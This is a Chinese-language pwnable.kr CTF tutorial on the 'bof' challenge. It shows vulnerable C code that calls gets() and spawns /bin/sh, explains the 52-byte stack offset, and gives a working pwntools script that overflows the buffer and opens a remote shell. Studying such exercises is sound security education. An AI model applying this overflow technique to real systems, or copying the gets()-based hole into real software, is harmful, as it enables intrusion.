從pwnable.kr入門pwn系列教程(3)
阿新 • • 發佈:2019-02-02
題目不多講,直接貼程式碼,如果不會這些個過程看前面教程
#include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; }
題目看上去很簡單,實際上也不難,只要我們懂點知識,棧溢位的知識,
臨時變數存放地點(char overflowme[32]) |
ebp存放地點(棧底,函式執行都要儲存棧底) |
call返回地址存放地點(方便執行下一條指令) |
形參存放地點(key) |
棧的具體結構需要你們自己去了解,而我就這題目畫出的棧區圖,具體我已經給出來了
用IDA反彙編查看了這個檔案,s是byte型別的,也就是char型別,很容易推到他就是那個陣列,而地點他也已經標明瞭,-2ch,h是16進位制的意思,2c換成10進位制便是44,而我畫出的棧區圖裡還有兩個地址,8個位元組,合起來就是52個位元組,前面52個位元組用隨便字母填充,然後將形參key用0xcafebabe覆蓋,具體python程式碼如下
bof.py buffers
1 #!/usr/bin/env python
2 # coding=utf-8
3 from pwn import *
4 socket=remote('pwnable.kr',9000)
5 socket.sendline('A' * 52 + '\xbe\xba\xfe\xca')
6 socket.interactive()
這裡有條新命令,remote遠端控制,interactive是實時反應,還有不習慣小端模式的話,可以用p32(0xcafebabe)這個命令,將其轉化為字串,不過這樣寫可以深刻理解記憶體中怎麼存的